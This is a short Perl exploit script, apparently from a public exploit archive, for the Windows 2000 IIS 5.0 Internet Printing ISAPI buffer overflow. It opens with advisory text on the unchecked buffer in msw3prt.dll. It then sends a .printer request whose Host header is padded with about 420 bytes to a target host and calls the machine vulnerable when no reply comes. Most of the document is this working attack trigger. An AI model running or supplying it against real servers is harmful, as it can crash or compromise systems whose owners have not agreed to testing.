51 lines
No EOL
2.2 KiB
Perl
Executable file
51 lines
No EOL
2.2 KiB
Perl
Executable file
#source: https://www.securityfocus.com/bid/2674/info
|
|
|
|
#Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
|
|
|
|
#* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings.
|
|
|
|
#!/usr/bin/perl
|
|
# Exploit By storm@stormdev.net
|
|
# Tested with sucess against Win2k IIS 5.0 + SP1
|
|
# Remote Buffer Overflow Test for Internet Printing Protocol
|
|
# This code was written after eEye brought this issue in BugTraq.
|
|
|
|
|
|
use Socket;
|
|
|
|
|
|
print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";
|
|
|
|
if (not $ARGV[0]) {
|
|
print qq~
|
|
Usage: webexplt.pl <host>
|
|
~;
|
|
exit;}
|
|
|
|
|
|
$ip=$ARGV[0];
|
|
|
|
print "Sending Exploit Code to host: " . $ip . "\n\n";
|
|
my @results=sendexplt("GET /NULL.printer HTTP/1.0\n" . "Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");
|
|
print "Results:\n";
|
|
|
|
if (not @results) {
|
|
print "The Machine tested has the IPP Vulnerability!";
|
|
}
|
|
print @results;
|
|
|
|
sub sendexplt {
|
|
my ($pstr)=@_;
|
|
$target= inet_aton($ip) || die("inet_aton problems");
|
|
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
|
|
die("Socket problems\n");
|
|
if(connect(S,pack "SnA4x8",2,80,$target)){
|
|
select(S);
|
|
$|=1;
|
|
print $pstr;
|
|
my @in=<S>;
|
|
select(STDOUT);
|
|
close(S);
|
|
return @in;
|
|
} else { die("Can't connect...\n"); }
|
|
} |